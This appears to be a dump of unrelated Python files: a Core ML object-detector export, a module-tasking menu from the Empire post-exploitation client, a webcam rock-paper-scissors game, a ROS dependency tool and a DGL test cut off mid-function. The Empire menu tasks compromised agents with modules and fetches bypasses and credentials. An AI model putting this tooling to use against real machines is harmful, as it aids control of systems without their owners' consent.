builder.add_elementwise(name=prefix + 'wh_pre',
mode='MULTIPLY',
input_names=[prefix + 'c_anchors', prefix + 'rel_wh'],
output_name=prefix + 'wh_pre')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'wh',
target_shape=[1, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'wh_pre',
output_name=prefix + 'wh')
# (1, 4, B*H*W, 1)
builder.add_elementwise(name=prefix + 'boxes_out_transposed',
mode='CONCAT',
input_names=[prefix + 'xy', prefix + 'wh'],
output_name=prefix + 'boxes_out_transposed')
# (1, B*H*W, 4, 1)
builder.add_permute(name=prefix + 'boxes_out',
dim=[0, 2, 1, 3],
input_name=prefix + 'boxes_out_transposed',
output_name=prefix + 'boxes_out')
scale = _np.zeros((num_bounding_boxes, 4, 1))
scale[:, 0::2] = 1.0 / self._grid_shape[1]
scale[:, 1::2] = 1.0 / self._grid_shape[0]
# (1, B*H*W, 4, 1)
builder.add_scale(name=COORDINATES_STR,
W=scale,
b=0,
has_bias=False,
shape_scale=(num_bounding_boxes, 4, 1),
input_name=prefix + 'boxes_out',
output_name=COORDINATES_STR)
# CLASS PROBABILITIES AND OBJECT CONFIDENCE
# (1, C, B, H*W)
builder.add_slice(name=prefix + 'scores_sp',
axis='channel',
start_index=5,
end_index=preds_per_box,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'scores_sp')
# (1, C, B, H*W)
builder.add_softmax(name=prefix + 'probs_sp',
input_name=prefix + 'scores_sp',
output_name=prefix + 'probs_sp')
# (1, 1, B, H*W)
builder.add_slice(name=prefix + 'logit_conf_sp',
axis='channel',
start_index=4,
end_index=5,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'logit_conf_sp')
# (1, 1, B, H*W)
builder.add_activation(name=prefix + 'conf_sp',
non_linearity='SIGMOID',
input_name=prefix + 'logit_conf_sp',
output_name=prefix + 'conf_sp')
# (1, C, B, H*W)
if num_classes > 1:
conf = prefix + 'conf_tiled_sp'
builder.add_elementwise(name=prefix + 'conf_tiled_sp',
mode='CONCAT',
input_names=[prefix+'conf_sp']*num_classes,
output_name=conf)
else:
conf = prefix + 'conf_sp'
# (1, C, B, H*W)
builder.add_elementwise(name=prefix + 'confprobs_sp',
mode='MULTIPLY',
input_names=[conf, prefix + 'probs_sp'],
output_name=prefix + 'confprobs_sp')
# (1, C, B*H*W, 1)
builder.add_reshape(name=prefix + 'confprobs_transposed',
target_shape=[1, num_classes, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'confprobs_sp',
output_name=prefix + 'confprobs_transposed')
# (1, B*H*W, C, 1)
builder.add_permute(name=CONFIDENCE_STR,
dim=[0, 2, 1, 3],
input_name=prefix + 'confprobs_transposed',
output_name=CONFIDENCE_STR)
_mxnet_converter._set_input_output_layers(
builder, input_names, output_names)
builder.set_input(input_names, input_dims)
builder.set_output(output_names, output_dims)
builder.set_pre_processing_parameters(image_input_names=self.feature)
model = builder.spec
if include_non_maximum_suppression:
# Non-Maximum Suppression is a post-processing algorithm
# responsible for merging all detections that belong to the
# same object.
# Core ML schematic
# +------------------------------------+
# | Pipeline |
# | |
# | +------------+ +-------------+ |
# | | Neural | | Non-maximum | |
# | | network +---> suppression +-----> confidences
# Image +----> | | | |
# | | +---> +-----> coordinates
# | | | | | |
# Optional inputs: | +------------+ +-^---^-------+ |
# | | | |
# IOU threshold +-----------------------+ | |
# | | |
# Confidence threshold +---------------------------+ |
# +------------------------------------+
model_neural_network = model.neuralNetwork
model.specificationVersion = 3
model.pipeline.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[0].neuralNetwork.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[1].nonMaximumSuppression.ParseFromString(b'')
# begin: Neural network model
nn_model = model.pipeline.models[0]
nn_model.description.ParseFromString(b'')
input_image = model.description.input[0]
input_image.type.imageType.width = self.input_image_shape[1]
input_image.type.imageType.height = self.input_image_shape[2]
nn_model.description.input.add()
nn_model.description.input[0].ParseFromString(
input_image.SerializeToString())
for i in range(2):
del model.description.output[i].type.multiArrayType.shape[:]
names = ["raw_confidence", "raw_coordinates"]
bounds = [self.num_classes, 4]
for i in range(2):
output_i = model.description.output[i]
output_i.name = names[i]
for j in range(2):
ma_type = output_i.type.multiArrayType
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[j].lowerBound = (
bounds[i] if j == 1 else 0)
ma_type.shapeRange.sizeRanges[j].upperBound = (
bounds[i] if j == 1 else -1)
nn_model.description.output.add()
nn_model.description.output[i].ParseFromString(
output_i.SerializeToString())
ma_type = nn_model.description.output[i].type.multiArrayType
ma_type.shape.append(num_bounding_boxes)
ma_type.shape.append(bounds[i])
# Think more about this line
nn_model.neuralNetwork.ParseFromString(
model_neural_network.SerializeToString())
nn_model.specificationVersion = model.specificationVersion
# end: Neural network model
# begin: Non maximum suppression model
nms_model = model.pipeline.models[1]
nms_model_nonMaxSup = nms_model.nonMaximumSuppression
for i in range(2):
output_i = model.description.output[i]
nms_model.description.input.add()
nms_model.description.input[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output.add()
nms_model.description.output[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output[i].name = (
'confidence' if i==0 else 'coordinates')
nms_model_nonMaxSup.iouThreshold = iou_threshold
nms_model_nonMaxSup.confidenceThreshold = confidence_threshold
nms_model_nonMaxSup.confidenceInputFeatureName = 'raw_confidence'
nms_model_nonMaxSup.coordinatesInputFeatureName = 'raw_coordinates'
nms_model_nonMaxSup.confidenceOutputFeatureName = 'confidence'
nms_model_nonMaxSup.coordinatesOutputFeatureName = 'coordinates'
nms_model.specificationVersion = model.specificationVersion
nms_model_nonMaxSup.stringClassLabels.vector.extend(self.classes)
for i in range(2):
nms_model.description.input[i].ParseFromString(
nn_model.description.output[i].SerializeToString()
)
if include_non_maximum_suppression:
# Iou Threshold
IOU_THRESHOLD_STRING = 'iouThreshold'
model.description.input.add()
model.description.input[1].type.doubleType.ParseFromString(b'')
model.description.input[1].name = IOU_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[2].ParseFromString(
model.description.input[1].SerializeToString()
)
nms_model_nonMaxSup.iouThresholdInputFeatureName = IOU_THRESHOLD_STRING
# Confidence Threshold
CONFIDENCE_THRESHOLD_STRING = 'confidenceThreshold'
model.description.input.add()
model.description.input[2].type.doubleType.ParseFromString(b'')
model.description.input[2].name = CONFIDENCE_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[3].ParseFromString(
model.description.input[2].SerializeToString())
nms_model_nonMaxSup.confidenceThresholdInputFeatureName = \
CONFIDENCE_THRESHOLD_STRING
# end: Non maximum suppression model
model.description.output[0].name = 'confidence'
model.description.output[1].name = 'coordinates'
iouThresholdString = '(optional) IOU Threshold override (default: {})'
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
model_type = 'object detector (%s)' % self.model
if include_non_maximum_suppression:
model_type += ' with non-maximum suppression'
model.description.metadata.shortDescription = \
_coreml_utils._mlmodel_short_description(model_type)
model.description.input[0].shortDescription = 'Input image'
if include_non_maximum_suppression:
iouThresholdString = '(optional) IOU Threshold override (default: {})'
model.description.input[1].shortDescription = \
iouThresholdString.format(iou_threshold)
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
model.description.input[2].shortDescription = \
confidenceThresholdString.format(confidence_threshold)
model.description.output[0].shortDescription = \
u'Boxes \xd7 Class confidence (see user-defined metadata "classes")'
model.description.output[1].shortDescription = \
u'Boxes \xd7 [x, y, width, height] (relative to image size)'
version = ObjectDetector._PYTHON_OBJECT_DETECTOR_VERSION
partial_user_defined_metadata = {
'model': self.model,
'max_iterations': str(self.max_iterations),
'training_iterations': str(self.training_iterations),
'include_non_maximum_suppression': str(
include_non_maximum_suppression),
'non_maximum_suppression_threshold': str(
iou_threshold),
'confidence_threshold': str(confidence_threshold),
'iou_threshold': str(iou_threshold),
'feature': self.feature,
'annotations': self.annotations,
'classes': ','.join(self.classes)
}
user_defined_metadata = _coreml_utils._get_model_metadata(
self.__class__.__name__,
partial_user_defined_metadata,
version)
model.description.metadata.userDefined.update(user_defined_metadata)
return model
def export_coreml(self, filename,
include_non_maximum_suppression = True,
iou_threshold = None,
confidence_threshold = None):
"""
Save the model in Core ML format. The Core ML model takes an image of
fixed size as input and produces two output arrays: `confidence` and
`coordinates`.
The first one, `confidence` is an `N`-by-`C` array, where `N` is the
number of instances predicted and `C` is the number of classes. The
number `N` is fixed and will include many low-confidence predictions.
The instances are not sorted by confidence, so the first one will
generally not have the highest confidence (unlike in `predict`). Also
unlike the `predict` function, the instances have not undergone
what is called `non-maximum suppression`, which means there could be
several instances close in location and size that have all discovered
the same object instance. Confidences do not need to sum to 1 over the
classes; any remaining probability is implied as confidence there is no
object instance present at all at the given coordinates. The classes
appear in the array alphabetically sorted.
The second array `coordinates` is of size `N`-by-4, where the first
dimension `N` again represents instances and corresponds to the
`confidence` array. The second dimension represents `x`, `y`, `width`,
`height`, in that order. The values are represented in relative
coordinates, so (0.5, 0.5) represents the center of the image and (1,
1) the bottom right corner. You will need to multiply the relative
values with the original image size before you resized it to the fixed
input size to get pixel-value coordinates similar to `predict`.
See Also
--------
save
Parameters
----------
filename : string
The path of the file where we want to save the Core ML model.
include_non_maximum_suppression : bool
Non-maximum suppression is only available in iOS 12+.
A boolean parameter to indicate whether the Core ML model should be
saved with built-in non-maximum suppression or not.
This parameter is set to True by default.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
suppression is. A value of 1 means no maximum suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
Examples
--------
>>> model.export_coreml('detector.mlmodel')
"""
from coremltools.models.utils import save_spec as _save_spec
model = self._create_coreml_model(include_non_maximum_suppression=include_non_maximum_suppression,
iou_threshold=iou_threshold, confidence_threshold=confidence_threshold)
_save_spec(model, filename)
|
UseModuleMenu.py
|
import threading
import time
from prompt_toolkit.completion import Completion
from empire.client.src.EmpireCliState import state
from empire.client.src.menus.UseMenu import UseMenu
from empire.client.src.utils import print_util
from empire.client.src.utils.autocomplete_util import filtered_search_list, position_util
from empire.client.src.utils.cli_util import register_cli_commands, command
@register_cli_commands
class UseModuleMenu(UseMenu):
def __init__(self):
super().__init__(display_name='usemodule', selected='', record=None, record_options=None)
self.stop_threads = False
def autocomplete(self):
return self._cmd_registry + super().autocomplete()
def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
if cmd_line[0] == 'usemodule' and position_util(cmd_line, 2, word_before_cursor):
for module in filtered_search_list(word_before_cursor, state.modules.keys()):
yield Completion(module, start_position=-len(word_before_cursor))
else:
yield from super().get_completions(document, complete_event, cmd_line, word_before_cursor)
def on_enter(self, **kwargs) -> bool:
if 'selected' not in kwargs:
return False
else:
state.get_bypasses()
self.use(kwargs['selected'])
self.stop_threads = False
if 'agent' in kwargs and 'Agent' in self.record_options:
self.set('Agent', kwargs['agent'])
self.info()
self.options()
state.get_credentials()
return True
def on_leave(self):
self.stop_threads = True
def use(self, module: str) -> None:
"""
Use the selected module
Usage: use <module>
"""
if module in state.modules.keys():
self.selected = module
self.record = state.modules[module]
self.record_options = state.modules[module]['options']
@command
def execute(self):
"""
Execute the selected module
Usage: execute
"""
post_body = {}
for key, value in self.record_options.items():
post_body[key] = self.record_options[key]['Value']
response = state.execute_module(self.selected, post_body)
if 'success' in response.keys():
print(print_util.color(
'[*] Tasked ' + self.record_options['Agent']['Value'] + ' to run Task ' + str(response['taskID'])))
shell_return = threading.Thread(target=self.tasking_id_returns, args=[response['taskID']])
shell_return.daemon = True
shell_return.start()
elif 'error' in response.keys():
if response['error'].startswith('[!]'):
msg = response['error']
else:
msg = f"[!] Error: {response['error']}"
print(print_util.color(msg))
@command
def generate(self):
"""
Execute the selected module
Usage: generate
"""
self.execute()
def tasking_id_returns(self, task_id: int):
"""
Polls for the tasks that have been queued.
Once found, will remove from the cache and display.
"""
count = 0
result = None
while result is None and count < 30 and not self.stop_threads:
# this may not work 100% of the time since there is a mix of agent session_id and names still.
result = state.cached_agent_results.get(self.record_options['Agent']['Value'], {}).get(task_id)
count += 1
time.sleep(1)
if result:
del state.cached_agent_results.get(self.record_options['Agent']['Value'], {})[task_id]
print(print_util.color(result))
use_module_menu = UseModuleMenu()
|
check.py
|
from random import randint
from PIL import Image
from threading import Thread
import tensorflow as tf
import numpy as np
import time
import cv2
import voicetest
pHand = []
def camcheck():
# Connect to camera
camera = cv2.VideoCapture(0)
# Take picture
time.sleep(0.2)
return_value, image = camera.read()
# Convert to Pillow-usable format
cv2im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
pilim = Image.fromarray(cv2im)
pilim.show()
# Disconnect from camera
del (camera)
# Convert to Tensorflow-usable format
bmp = pilim.convert('L').resize([60, 60])
hand = np.asarray(bmp).flatten().tolist()
pHand.append(hand)
ch_np = np.matrix(pHand).astype(np.float32)
return ch_np
def check():
# Intro music
bass_thread = Thread(target=voicetest.bass)
mel_thread = Thread(target=voicetest.melody)
bass_thread.start()
mel_thread.start()
time.sleep(7)
# Import data
check_img = camcheck()
real_hand = 0
cpu_hand = randint(1, 3)
if cpu_hand == 1:
rock = Image.open("Hands/Test/Rock/WIN_20171206_18_56_57_Pro.jpg")
rock.show()
elif cpu_hand == 2:
paper = Image.open("Hands/Test/Paper/WIN_20171206_19_15_36_Pro.jpg")
paper.show()
else:
scissors = Image.open("Hands/Test/Scissors/WIN_20171206_18_44_51_Pro.jpg")
scissors.show()
# Recreate model
x = tf.placeholder(tf.float32, [None, 3600])
w = tf.Variable(tf.zeros([3600, 3]), name='w')
b = tf.Variable(tf.zeros([3]), name='b')
y = tf.matmul(x, w) + b
# Initialize saver
saver = tf.train.Saver()
# Check image(s)
with tf.Session() as sess:
saver.restore(sess, 'model\my_training-1100') # TODO Mod source file for previous file changes in handparser.py
sr = sess.run(y, feed_dict={x: check_img})
prediction = (sess.run(tf.argmax(sr, 1)))
if prediction[0] == 0:
real_hand = 1
elif prediction[0] == 1:
real_hand = 2
else:
real_hand = 3
print(real_hand)
print(cpu_hand)
def hand_name():
if real_hand == 1:
return "ROCK"
elif real_hand == 2:
return "PAPER"
else:
return "SCISSORS"
def roshanbo():
if real_hand == 1 and cpu_hand == 2:
voicetest.lose()
print("PAPER BEATS ROCK ... I WIN")
elif real_hand == 1 and cpu_hand == 3:
voicetest.win()
print("ROCK BEATS SCISSORS ... YOU WIN")
elif real_hand == 2 and cpu_hand == 1:
voicetest.win()
print("PAPER BEATS ROCK ... YOU WIN")
elif real_hand == 2 and cpu_hand == 3:
voicetest.lose()
print("SCISSORS BEATS PAPER ... I WIN")
elif real_hand == 3 and cpu_hand == 1:
voicetest.lose()
print("ROCK BEATS SCISSORS ... I WIN")
elif real_hand == 3 and cpu_hand == 2:
voicetest.win()
print("SCISSORS BEATS PAPER ... YOU WIN")
else:
voicetest.what()
print("A %s TIE" % hand_name())
roshanbo()
if __name__ == '__main__':
check()
|
rosdistro.py
|
import copy
import os
import sys
import tarfile
import tempfile
import threading
import urllib
try:
from urllib.request import urlopen
from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen
from urllib2 import HTTPError
from .common import info
from .common import warning
from .common import error
RES_DICT = {'build': [], 'buildtool': [], 'test': [], 'run': []}
RES_TREE = {'build': {}, 'buildtool': {}, 'test': {}, 'run': {}}
CACHE_VERSION = 1
walks = {
'FULL_WALK': {'build': ['build', 'run', 'buildtool', 'test'],
'run': ['build', 'run', 'buildtool', 'test'],
'buildtool': ['build', 'run', 'buildtool', 'test'],
'test': ['build', 'run', 'buildtool', 'test']},
'SPIRAL_OF_DOOM': {'build': ['run'],
'run': ['buildtool'],
'buildtool': ['test'],
'test': ['build']}
}
def invert_dict(d):
inverted = {}
for key, value in d.iteritems():
for v in value:
v_keys = inverted.setdefault(v, [])
if key not in v_keys:
v_keys.append(key)
return inverted
class RosDistro:
def __init__(self, name, cache_location=None):
self.depends_on1_cache = copy.deepcopy(RES_TREE)
t1 = threading.Thread(target=self._construct_rosdistro_file, args=(name,))
t2 = threading.Thread(target=self._construct_rosdistro_dependencies, args=(name, cache_location,))
t1.start()
t2.start()
t1.join()
t2.join()
def _construct_rosdistro_file(self, name):
self.distro_file = RosDistroFile(name)
def _construct_rosdistro_dependencies(self, name, cache_location):
self.depends_file = RosDependencies(name, cache_location)
def get_repositories(self):
return self.distro_file.repositories
def get_repository(self, repo):
return self.get_repositories()[repo]
def get_packages(self):
return self.distro_file.packages
def get_package(self, pkg):
return self.get_packages()[pkg]
def get_rosinstall(self, items, version='last_release', source='vcs'):
rosinstall = ""
for p in self._convert_to_pkg_list(items):
rosinstall += p.get_rosinstall(version, source, self.distro_file.name)
return rosinstall
def _get_depends_on1(self, package_name):
if package_name in self.depends_on1_cache:
return self.depends_on1_cache[package_name]
res = copy.deepcopy(RES_DICT)
for pkg in self.get_packages():
for key, depends in self._get_depends1(pkg).iteritems():
if package_name in depends:
res[key].append(pkg)
self.depends_on1_cache[package_name] = res
return res
def get_depends_on1(self, items):
return self.get_depends_on(items, 1)
def get_depends_on(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_on_recursive(p.name, dep_type, invert_dict(dep_dict), dep_list, depth, 1)
return res
def _get_depends_on_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps_on = self._get_depends_on1(package_name)
# merge and recurse
for d in deps_on[dep_type]:
if not d in res:
res.append(d)
if depth == 0 or curr_depth < depth:
for next_dep_type in dep_dict[dep_type]:
self._get_depends_on_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth+1)
def _get_depends1(self, package_name):
p = self.distro_file.packages[package_name]
return self.depends_file.get_dependencies(p, self.distro_file.name)
def get_depends1(self, items):
return self.get_depends(items, 1)
def get_depends(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_recursive(p.name, dep_type, dep_dict, dep_list, depth, 1)
return res
def _get_depends_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps1 = self._get_depends1(package_name)
# merge and recurse
for d in deps1[dep_type]:
if not d in res:
res.append(d)
if depth == 0 or curr_depth < depth:
if d in self.get_packages(): # recurse on packages only
for next_dep_type in dep_dict[dep_type]:
self._get_depends_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth+1)
def _convert_to_pkg_list(self, items):
if type(items) != list:
items = [items]
pkgs = []
for i in items:
if i in self.distro_file.repositories:
for p in self.distro_file.repositories[i].packages:
if not p in pkgs:
pkgs.append(p)
elif i in self.distro_file.packages:
if not self.distro_file.packages[i] in pkgs:
pkgs.append(self.distro_file.packages[i])
else:
raise RuntimeError("!!! {0} is not a package name nor a repository name".format(i))
return pkgs
class RosDistroFile:
def __init__(self, name):
self.packages = {}
self.repositories = {}
self.name = name
# parse ros distro file
distro_url = urlopen('https://raw.github.com/ros/rosdistro/master/releases/%s.yaml' % name)
distro = yaml.load(distro_url.read())['repositories']
# loop over all repo's
for repo_name, data in distro.iteritems():
repo = RosRepository(repo_name, data['version'], data['url'])
self.repositories[repo_name] = repo
if 'packages' not in data: # support unary disto's
data['packages'] = {repo_name: ''}
# loop over all packages
for pkg_name in data['packages'].keys():
pkg = RosPackage(pkg_name, repo)
repo.packages.append(pkg)
self.packages[pkg_name] = pkg
class RosRepository:
def __init__(self, name, version, url):
self.name = name
self.version = version
self.url = url
self.packages = []
def get_rosinstall(self, version, source):
return "\n".join([p.get_rosinstall(version, source) for p in self.packages])
class RosPackage:
def __init__(self, name, repository):
self.name = name
self.repository = repository
self._package_xmls = {}
self._release_tags = {}
def _fetch_package_xml(self, rosdistro):
repo = self.repository
if 'github.com' in repo.url:
url = repo.url
upstream_version = repo.version.split('-')[0]
release_tag = 'release/{0}/{1}'.format(self.name, upstream_version)
url = url.replace('.git', '/{0}/package.xml'.format(release_tag))
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
try:
try:
package_xml = urlopen(url).read()
except Exception as e:
msg = "Failed to read package.xml file from url '{0}': {1}".format(url, e)
warning(msg)
url = repo.url
release_tag = 'release/{0}/{1}/{2}'.format(rosdistro, self.name, repo.version)
tail = '/{0}/package.xml'.format(release_tag)
url = url.replace('.git', tail)
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
info("Trying to read from url '{0}' instead".format(url))
package_xml = urlopen(url).read()
except Exception as e:
msg += '\nAND\n'
msg += "Failed to read package.xml file from url '{0}': {1}".format(url, e)
raise RuntimeError(msg)
self._package_xmls[rosdistro] = package_xml
self._release_tags[rosdistro] = release_tag
return package_xml, release_tag
else:
raise Exception("Non-github repositories are net yet supported by the rosdistro tool")
def get_package_xml(self, rosdistro):
if rosdistro not in self._package_xmls:
self._fetch_package_xml(rosdistro)
return self._package_xmls[rosdistro]
def get_release_tag(self, rosdistro):
if rosdistro not in self._release_tags:
self._fetch_package_xml(rosdistro)
return self._release_tags[rosdistro]
def get_rosinstall(self, version, source, rosdistro):
# can't get last release of unreleased repository
if version == 'last_release' and not self.repository.version:
raise RuntimeError("Can't get the last release of unreleased repository {0}".format(self.repository.name))
# set specific version of last release of needed
if version == 'last_release':
version = self.repository.version.split('-')[0]
# generate the rosinstall file
release_tag = self.get_release_tag(rosdistro)
if version == 'master':
return yaml.dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': '/'.join(release_tag.split('/')[:-1])
}}],
default_style=False)
else:
if source == 'vcs':
return yaml.safe_dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': release_tag
}}],
default_style=False)
elif source == 'tar':
uri = self.repository.url
uri = uri.replace('git://', 'https://')
uri = uri.replace('.git', '/archive/{0}.tar.gz'.format(release_tag))
return yaml.safe_dump([{
'tar': {
'local-name': self.name,
'uri': uri,
'version': '{0}-release-{1}'.format(self.repository.name, release_tag.replace('/', '-'))
}}],
default_style=False)
else:
raise RuntimeError("Invalid source type {0}".format(source))
class RosDependencies:
def __init__(self, name, cache_location):
# url's
self.file_name = '%s-dependencies.yaml' % name
if cache_location:
self.local_url = os.path.join(cache_location, self.file_name)
else:
from rospkg import environment
self.local_url = os.path.join(environment.get_ros_home(), self.file_name)
self.server_url = 'http://www.ros.org/rosdistro/%s-dependencies.tar.gz' % name
self.dependencies = {}
# initialize with the local or server cache
deps = self._read_local_cache()
if deps == {}:
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
if self.cache == 'server':
self._write_local_cache()
def get_dependencies(self, package, rosdistro):
repo = package.repository
# support unreleased stacks
if not repo.version:
return copy.deepcopy(RES_DICT)
key = '%s?%s?%s' % (repo.name, repo.version, package.name)
# check in memory first
if key in self.dependencies:
return self.dependencies[key]
# read server cache if needed
if self.cache != 'server':
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
self._write_local_cache()
if key in self.dependencies:
return self.dependencies[key]
# retrieve dependencies
deps = retrieve_dependencies(package.get_package_xml(rosdistro))
self.dependencies[key] = deps
self._write_local_cache()
return deps
def _read_server_cache(self):
self.cache = 'server'
try:
resp = urlopen(self.server_url)
except HTTPError as ex:
warning("Failed to read server cache: %s" % ex)
return {}
with tempfile.NamedTemporaryFile('w') as fh:
fh.write(resp.read())
fh.flush()
tar = tarfile.open(fh.name, 'r')
data = tar.extractfile(self.file_name)
deps = yaml.load(data.read())
if not deps \
or not 'cache_version' in deps \
or deps['cache_version'] != CACHE_VERSION \
or not 'repositories' in deps:
raise
return deps['repositories']
def _read_local_cache(self):
try:
self.cache = 'local'
with open(self.local_url) as f:
deps = yaml.safe_load(f.read())
if not deps \
or not 'cache_version' in deps \
or deps['cache_version'] != CACHE_VERSION \
or not 'repositories' in deps:
raise
return deps['repositories']
except Exception:
return {}
def _write_local_cache(self):
try:
try:
os.makedirs(os.path.dirname(self.local_url))
except:
pass
with open(self.local_url, 'w') as f:
yaml.dump({'cache_version': CACHE_VERSION,
'repositories': self.dependencies},
f)
except Exception as ex:
error("Failed to write local dependency cache to %s: %s" % (self.local_url, ex))
def retrieve_dependencies(package_xml):
try:
return get_package_dependencies(package_xml)
except Exception:
raise RuntimeError("Failed to get dependencies from package_xml:\n```\n{0}\n```".format(package_xml))
def get_package_dependencies(package_xml):
if not os.path.abspath("/usr/lib/pymodules/python2.7") in sys.path:
sys.path.append("/usr/lib/pymodules/python2.7")
from catkin_pkg import package as catkin_pkg
pkg = catkin_pkg.parse_package_string(package_xml)
depends1 = {'build': [d.name for d in pkg.build_depends],
'buildtool': [d.name for d in pkg.buildtool_depends],
'test': [d.name for d in pkg.test_depends],
'run': [d.name for d in pkg.run_depends]}
return depends1
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
import dgl
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, graph_name,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
import dgl
gpb = None
if disable_shared_mem:
_, _, _, gpb = load_partition(tmpdir / 'test_sampling.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.shutdown_servers()
dgl.distributed.finalize_client()
return sampled_graph
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling_shuffle():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
import dgl
gpb = None
if disable_shared_mem:
_, _, _, gpb = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.shutdown_servers()
dgl.distributed.finalize_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
